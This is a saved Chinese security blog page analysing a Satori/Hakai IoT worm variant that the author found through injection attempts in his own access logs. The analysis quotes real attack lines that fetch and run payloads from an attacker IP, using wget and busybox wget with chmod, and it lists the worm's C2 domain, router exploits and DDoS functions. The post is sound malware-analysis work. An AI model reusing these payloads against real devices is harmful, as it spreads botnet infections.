<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="googlea4e6eb27cf4f8663.html" />














  
  
    
  
  <link href="https://cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.css" rel="stylesheet" type="text/css" />







  

<link href="https://cdn.bootcss.com/font-awesome/4.6.2/fonts/fontawesome-webfont.svg" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/avatar.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/avatar.jpg?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">


  <link rel="manifest" href="/images/manifest.json">


  <meta name="msapplication-config" content="/images/browserconfig.xml" />



  <meta name="keywords" content="Botnets,蠕虫分析," />










<meta name="description" content="前言近日，在博客的访问日志上发现一些略显奇特的访问记录，看起来像是远程命令执行，在好奇心(没事干)的驱使下深究下去，然后终于——揭开了，嗯，蠕虫传播的冰山一角。。。(本文标题为360 netlab发表的一篇蠕虫分析文章标题的意译)">
<meta name="keywords" content="Botnets,蠕虫分析">
<meta property="og:type" content="article">
<meta property="og:title" content="Satori不愿消退，僵尸网络永不消亡">
<meta property="og:url" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/index.html">
<meta property="og:site_name" content="Wz&#39;s Blog">
<meta property="og:description" content="前言近日，在博客的访问日志上发现一些略显奇特的访问记录，看起来像是远程命令执行，在好奇心(没事干)的驱使下深究下去，然后终于——揭开了，嗯，蠕虫传播的冰山一角。。。(本文标题为360 netlab发表的一篇蠕虫分析文章标题的意译)">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/16-09-00.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/15-01-30.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-21-47.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-23-09.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-41-13.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/11-18-55.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/11-51-40.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/11-54-46.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/18-47-53.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-00-32.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/18-50-59.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-07-15.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-10-45.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-19-03.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-52-08.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/01-28-19.jpg">
<meta property="og:updated_time" content="2018-08-07T17:43:15.734Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Satori不愿消退，僵尸网络永不消亡">
<meta name="twitter:description" content="前言近日，在博客的访问日志上发现一些略显奇特的访问记录，看起来像是远程命令执行，在好奇心(没事干)的驱使下深究下去，然后终于——揭开了，嗯，蠕虫传播的冰山一角。。。(本文标题为360 netlab发表的一篇蠕虫分析文章标题的意译)">
<meta name="twitter:image" content="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/16-09-00.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/"/>





  <title>Satori不愿消退，僵尸网络永不消亡 | Wz's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Wz's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">安全菜鸡的挖坑填坑之旅</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            浏览
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.wzsite.cn/2018/08/06/Satori不愿消退，僵尸网络永不消亡/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="W z">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Wz's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">Satori不愿消退，僵尸网络永不消亡</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-08-06T22:21:00+08:00">
                2018-08-06
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/安全之旅/" itemprop="url" rel="index">
                    <span itemprop="name">安全之旅</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>近日，在博客的访问日志上发现一些略显奇特的访问记录，看起来像是远程命令执行，在好奇心(<del>没事干</del>)的驱使下深究下去，然后终于——揭开了，嗯，蠕虫传播的冰山一角。。。<br>(本文标题为<code>360 netlab</code>发表的一篇蠕虫分析文章标题的意译)<br><a id="more"></a></p>
<h2 id="访问记录"><a href="#访问记录" class="headerlink" title="访问记录"></a>访问记录</h2><p>笔者喜欢有事没事翻一下博客的访问记录，一来看看除了爬虫还有谁会看我的文章，二来观察爬虫、扫描器以及各种各样的payload的特征，寻找其有意思的地方，说不定以后还能当做自己扫描器的Fuzz路径或者按照思路做一个蜜罐啥的。<br>前几天随便扫一眼日志时，发现了类似命令执行的访问记录<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">156.211.122.123 - - [04/Aug/2018:21:50:41 +0800] &quot;GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1&quot; 400 173 &quot;-&quot; &quot;Hakai/2.0&quot;</div><div class="line">41.45.142.236 - - [04/Aug/2018:23:07:02 +0800] &quot;GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1&quot; 400 173 &quot;-&quot; &quot;Hakai/2.0&quot;</div><div class="line">156.219.34.60 - - [06/Aug/2018:01:42:11 +0800] &quot;GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1&quot; 400 173 &quot;-&quot; &quot;Hakai/2.0&quot;</div><div class="line">197.43.118.238 - - [06/Aug/2018:02:10:07 +0800] &quot;GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1&quot; 400 173 &quot;-&quot; &quot;Hakai/2.0&quot;</div></pre></td></tr></table></figure></p>
<p>看起来就像是带着payload访问一下就能直接下载文件并执行，随后删除掉。<br>访问<code>http://46.166.185.42/e</code></p>
<img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/16-09-00.jpg" alt="16-09-00.jpg" title="">
<p>嗯，赤裸裸的命令执行<br>分别把文件下载下来执行再删除，很熟练的操作<br>很”庆幸“的是，我还能把文件下载下来，之前找过几个类似的，每一个能活到能下载给我分析的，只不过<code>hakai.arm5</code>变<code>404</code>了<br>其余三个文件都是elf文件:<code>hakai.mips</code>、<code>hakai.mpsl</code>、<code>hakai.x86_64</code><br>我分析了其中一个——<code>hakai.x86_64</code>，毕竟从蠕虫作者的角度来想，每个文件的功能都一样是差不多的，只是运行在不同的平台，这样一来就能减少开发以及管理成本，所以分析一个就差不多了</p>
<h2 id="逆向分析"><a href="#逆向分析" class="headerlink" title="逆向分析"></a>逆向分析</h2><p>打开IDA，静态分析一下。很庆幸并没有加壳混淆，对本菜十分友好。<br>其中出现的一些payload字符串拿去google一下，发现在今年6月份的时候，360 netlab已经发布了一篇文章——<a href="http://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/" target="_blank" rel="external">Botnets never Die, Satori REFUSES to Fade Away</a>，经过分析，我拿到的样本从加密方式以及行为来看应该是Satori蠕虫的变种，所以本文也应用了这篇文章标题的意译作为标题。<br>先来看一下主函数：<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/15-01-30.jpg" alt="15-01-30.jpg" title=""><br>大概可以看出该蠕虫有以下功能</p>
<ul>
<li>修改进程名为<code>sshd</code>或<code>/usr/sbin/dropbear</code>进行隐藏</li>
<li>针对华为、dlink设备特定漏洞进行传播</li>
<li>针对23、2323端口Telnet服务进行密码爆破攻击</li>
<li>疑似设备操作方式实现持续化控制(wacthdog)</li>
<li>实现远控。从主机接受特定格式的指令，实现自定义HTTP包发送、TCP Flood、UDP Flood以及Std Flood<br>其中还有一些加密字符串</li>
</ul>
<img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-21-47.jpg" alt="20-21-47.jpg" title="">
<p>加/解密算法均为<code>deobf()</code><br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-23-09.jpg" alt="20-23-09.jpg" title=""><br>看起来是简单的置换密码<br>直接在源文件上<code>patch</code>一段解密汇编得到每个索引对应的密文(中间有些索引没用，所以索引不连续)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">1. gosh that chinese family at the other table sure ate alot</div><div class="line">2. hakaiboatnet.pw</div><div class="line">3. /proc/</div><div class="line">4. /exe</div><div class="line">6. /fd</div><div class="line">7. /maps</div><div class="line">8. /proc/net/tcp</div><div class="line">9. 1gcab4dom35hnp2lei0jkf</div><div class="line">10. UPX!</div><div class="line">11. dvrHelper</div><div class="line">15. /dev/watchdog</div><div class="line">16. /dev/misc/watchdog</div><div class="line">17. shell</div><div class="line">18. enable</div><div class="line">19. system</div><div class="line">20. /bin/busybox REKAI</div><div class="line">21. sh</div><div class="line">22. REKAI: applet not found</div><div class="line">23. ncorrect</div><div class="line">26. /bin/busybox ps</div><div class="line">27. /bin/busybox kill -9/</div></pre></td></tr></table></figure></p>
<p>emmm，其他都能理解，这第一个加密的吐槽是跟国人有仇咩<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-41-13.jpg" alt="20-41-13.jpg" title=""><br>嗯，蠕虫作者应该是个外国人，而且极有可能在餐厅写蠕虫的时候旁边桌的国人放了个屁~</p>
<h4 id="端口爆破"><a href="#端口爆破" class="headerlink" title="端口爆破"></a>端口爆破</h4><p>先看看各个部分的功能与流程<br>蠕虫作者首先对爆破的账号密码进行了加密，然后解密加进账号密码内存池待用<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/11-18-55.jpg" alt="11-18-55.jpg" title="">然后进行23以及2323端口进行端口开发探测，并加进连接记录表</p>
<img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/11-51-40.jpg" alt="11-51-40.jpg" title="">
<p>然后根据返回信息的解析进行账号密码的爆破<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/11-54-46.jpg" alt="11-54-46.jpg" title=""><br>最后起shell<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/18-47-53.jpg" alt="18-47-53.jpg" title=""><br>嗯，终于明白为什么之前我的22端口一直被爆破，每次登上去都有几千个错误尝试的记录<br>恐怕都是这些僵尸网络干的<br>不过后面我尝试把登录端口换成一个四位数的端口，从此世界都清净了<br>有强迫症的读者可以一试</p>
<h4 id="huawei-scanner"><a href="#huawei-scanner" class="headerlink" title="huawei_scanner"></a>huawei_scanner</h4><p>这个部分主要是针对华为路由器漏洞CVE-2017-17215的进行利用然后传播。<br>漏洞原理可以看<a href="https://paper.seebug.org/490/" target="_blank" rel="external">Seebug Paper - Huawei HG532 系列路由器远程命令执行漏洞分析</a><br>利用姿势可以参考<a href="https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/" target="_blank" rel="external">玄武实验室 - 对华为HG532远程命令执行漏洞的新探索</a><br>Satori用的是这个<code>payload</code>：</p>
<img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-00-32.jpg" alt="19-00-32.jpg" title="">
<p>嗯，看起来是XXE<br>同理首先构造了一个TCP包发出去<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/18-50-59.jpg" alt="18-50-59.jpg" title=""><br>接收数据包并判断是否是是<code>37215</code>漏洞端口发出的<code>SYN-ACK</code>包<br>随之TCP握手<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-07-15.jpg" alt="19-07-15.jpg" title=""><br>开始发<code>palyload</code></p>
<img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-10-45.jpg" alt="19-10-45.jpg" title="">
<p>无非是想执行这一段命令：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">/bin/busybox wget -g 46.166.185.42 -l /tmp/hakai -r /hakai.huawei</div><div class="line">/bin/busybox chmod 777 * /tmp/hakai; /tmp/hakai huawei</div><div class="line"><span class="built_in">echo</span> HUAWEIUPNP</div></pre></td></tr></table></figure></p>
<p>就这样，这样蠕虫传播完成<br>不过一般情况下WAN口访问<code>37215</code>端口是被过滤的，所以还是有一些局限性的</p>
<h4 id="dlink-scanner"><a href="#dlink-scanner" class="headerlink" title="dlink_scanner"></a>dlink_scanner</h4><p>dlink_scanner利用的是<code>D-Link DSL-2750B</code>上的远程命令执行漏洞<br>简单一个参数就能远程执行命令<br><code>payload</code>如下<br><img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/19-19-03.jpg" alt="19-19-03.jpg" title=""><br>扫描的步骤和上面提到的大同小异，都是先探测记录后发送payload，然后再执行命令，下载远程恶意文件执行<br>在此不再赘述</p>
<h4 id="远控功能"><a href="#远控功能" class="headerlink" title="远控功能"></a>远控功能</h4><p>执行完扫描传播之后，蠕虫会有一个<code>while(1)</code>循环一直接受来自主机的指令以解析执行<br>其中可执行的有四个功能：</p>
<ol>
<li>HTTPHEX<br>自定义发送<code>HTTP</code>请求<br>支持<code>GET</code>，<code>POST</code>，<code>HEAD</code>三种方式，以及随机以下几个UA：<img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/20-52-08.jpg" alt="20-52-08.jpg" title=""></li>
<li>UDP Flood DOS攻击指定目标</li>
<li>TCP Flood DOS攻击指定目标</li>
<li>Std Flood DOS攻击指定目标<br>不明所以的Std Flood功能，看起来只是UDP Flood，并没有UDP Flood 部分代码那么复杂</li>
</ol>
<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>根据<a href="https://www.tachyonsystems.de/honeynet.php" target="_blank" rel="external">tachyonsystems.de</a>的蜜罐攻击记录来看，Satori蠕虫在过去几天活动极为频繁，甚至已经跃升第一</p>
<img src="/2018/08/06/Satori不愿消退，僵尸网络永不消亡/01-28-19.jpg" alt="01-28-19.jpg" title="">
<p>并且在本菜写文章这两天，蠕虫主机IP的蠕虫程序已经经历了代码变种-&gt;加入混淆-&gt;无法访问(或者跑路)三个阶段，可谓瞬息万变。<br>安全之路，仍任重道远。</p>

      
    </div>
    
    
    
	<div>
	  
		<div>
    
		<br>
		</br>
        <div style="text-align:center;color: #ccc;font-size:14px">----- 感谢阅读 -----<br></br></div>
    
</div>
	  
	</div>
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Botnets/" rel="tag"># Botnets</a>
          
            <a href="/tags/蠕虫分析/" rel="tag"># 蠕虫分析</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/31/写一个Web目录扫描器/" rel="next" title="写一个Web目录扫描器">
                <i class="fa fa-chevron-left"></i> 写一个Web目录扫描器
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2099/09/22/Notice/" rel="prev" title="Notice">
                Notice <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">W z</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/wananpIG" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="testzero.wz@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#访问记录"><span class="nav-number">2.</span> <span class="nav-text">访问记录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#逆向分析"><span class="nav-number">3.</span> <span class="nav-text">逆向分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#端口爆破"><span class="nav-number">3.0.1.</span> <span class="nav-text">端口爆破</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#huawei-scanner"><span class="nav-number">3.0.2.</span> <span class="nav-text">huawei_scanner</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dlink-scanner"><span class="nav-number">3.0.3.</span> <span class="nav-text">dlink_scanner</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#远控功能"><span class="nav-number">3.0.4.</span> <span class="nav-text">远控功能</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#写在最后"><span class="nav-number">4.</span> <span class="nav-text">写在最后</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">W z</span>

  
</div>


<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>




  <span class="post-meta-divider">|</span>



<div class="powered-by">
 桂ICP备17008880号
 </div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="https://cdn.jsdelivr.net/jquery/2.1.3/jquery.min.js"></script>
  

  
  
    <script type="text/javascript" src="https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js"></script>
  

  
  
    <script type="text/javascript" src="https://cdn.bootcss.com/jquery_lazyload/1.9.7/jquery.lazyload.js"></script>
  

  
  
    <script type="text/javascript" src="https://cdn.bootcss.com/velocity/1.2.1/velocity.min.js"></script>
  

  
  
    <script type="text/javascript" src="https://cdn.bootcss.com/velocity/1.2.1/velocity.ui.min.js"></script>
  

  
  
    <script type="text/javascript" src="https://cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.pack.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
